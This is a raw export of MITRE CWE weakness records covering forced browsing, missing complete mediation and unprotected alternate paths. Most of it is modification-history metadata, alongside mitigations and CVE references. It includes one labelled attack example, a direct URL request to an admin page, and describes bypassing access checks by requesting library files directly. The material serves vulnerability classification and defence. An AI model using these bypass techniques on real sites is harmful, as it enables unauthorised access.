"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "862",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "288",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "424",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "471",
"Nature": "CanPrecede",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "98",
"Nature": "CanPrecede",
"Ordinal": null,
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "If forced browsing is possible, an attacker may be able to directly access a sensitive page by entering a URL similar to the following.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\thttp://somesite.com/someapplication/admin.jsp\n```",
"IntroText": null,
"Language": "JSP",
"Nature": "Attack",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 5
|
[
[
"284",
"285",
"862",
"425"
],
[
"284",
"287",
"306",
"288",
"425"
],
[
"693",
"424",
"425"
],
[
"710",
"657",
"638",
"424",
"425"
],
[
"284",
"285",
"862",
"638",
"424",
"425"
]
] |
[] |
638
|
Not Using Complete Mediation
|
Class
|
Simple
|
Draft
|
The product does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity's rights or privileges change over time.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity",
"Execute Unauthorized Code or Commands",
"Bypass Protection Mechanism",
"Read Application Data",
"Other"
],
"Likelihood": null,
"Note": "A user might retain access to a critical resource even after privileges have been revoked, possibly allowing access to privileged functionality or sensitive information, depending on the role of the resource.",
"Scope": [
"Integrity",
"Confidentiality",
"Availability",
"Access Control",
"Other"
]
}
] |
[
{
"Description": "Invalidate cached privileges, file handles or descriptors, or other access credentials whenever identities, processes, policies, roles, capabilities or permissions change. Perform complete authentication checks before accepting, caching and reusing data, dynamic content and code (scripts). Avoid caching access control decisions as much as possible.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Identify all possible code paths that might access sensitive resources. If possible, create and use a single interface that performs the access checks, and develop code standards that require use of this interface.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "Server does not properly validate client certificates when reusing cached connections.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-0408",
"Reference": "CVE-2007-0408"
}
] | null |
[
{
"EntryID": "SFP20",
"EntryName": "Race Condition Window",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
}
] |
[
"104"
] |
[
{
"Authors": [
"Jerome H. Saltzer",
"Michael D. Schroeder"
],
"Edition": null,
"ExternalReferenceID": "REF-196",
"Publication": "Proceedings of the IEEE 63",
"PublicationDay": null,
"PublicationMonth": "09",
"PublicationYear": "1975",
"Publisher": null,
"Section": null,
"Title": "The Protection of Information in Computer Systems",
"URL": "http://web.mit.edu/Saltzer/www/publications/protection/",
"URLDate": null
},
{
"Authors": [
"Sean Barnum",
"Michael Gegick"
],
"Edition": null,
"ExternalReferenceID": "REF-526",
"Publication": null,
"PublicationDay": "12",
"PublicationMonth": "09",
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "Complete Mediation",
"URL": "https://web.archive.org/web/20221006191503/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/complete-mediation",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2008-01-18",
"SubmissionName": "Pascal Meunier",
"SubmissionOrganization": "Purdue University",
"SubmissionReleaseDate": "2008-01-30",
"SubmissionVersion": "Draft 8",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Observed_Example, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-01-12",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2010-12-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-01-12",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Design Principle Violation: Not Using Complete Mediation",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2010-12-13",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Failure to Use Complete Mediation",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "657",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "862",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "When executable library files are used on web servers, which is common in PHP applications, the developer might perform an access check in any user-facing executable, and omit the access check from the library file itself. By directly requesting the library file (CWE-425), an attacker can bypass this access check.",
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-166"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "When a developer begins to implement input validation for a web application, often the validation is performed in each area of the code that uses externally-controlled input. In complex applications with many inputs, the developer often misses a parameter here or a cookie there. One frequently-applied solution is to centralize all input validation, store these validated inputs in a separate data structure, and require that all access of those inputs must be through that data structure. An alternate approach would be to use an external input validation framework such as Struts, which performs the validation before the inputs are ever processed by the code.",
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 2
|
[
[
"710",
"657",
"638"
],
[
"284",
"285",
"862",
"638"
]
] |
[
"424"
] |
424
|
Improper Protection of Alternate Path
|
Class
|
Simple
|
Draft
|
The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Bypass Protection Mechanism",
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Deploy different layers of protection to implement security in depth.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "Access-control setting in web-based document collaboration tool is not properly implemented by the code, which prevents listing hidden directories but does not prevent direct requests to files in those directories.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-29238",
"Reference": "CVE-2022-29238"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Alternate Path Errors",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "SFP35",
"EntryName": "Insecure resource access",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
}
] |
[
"127",
"554"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Other_Notes",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2010-12-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
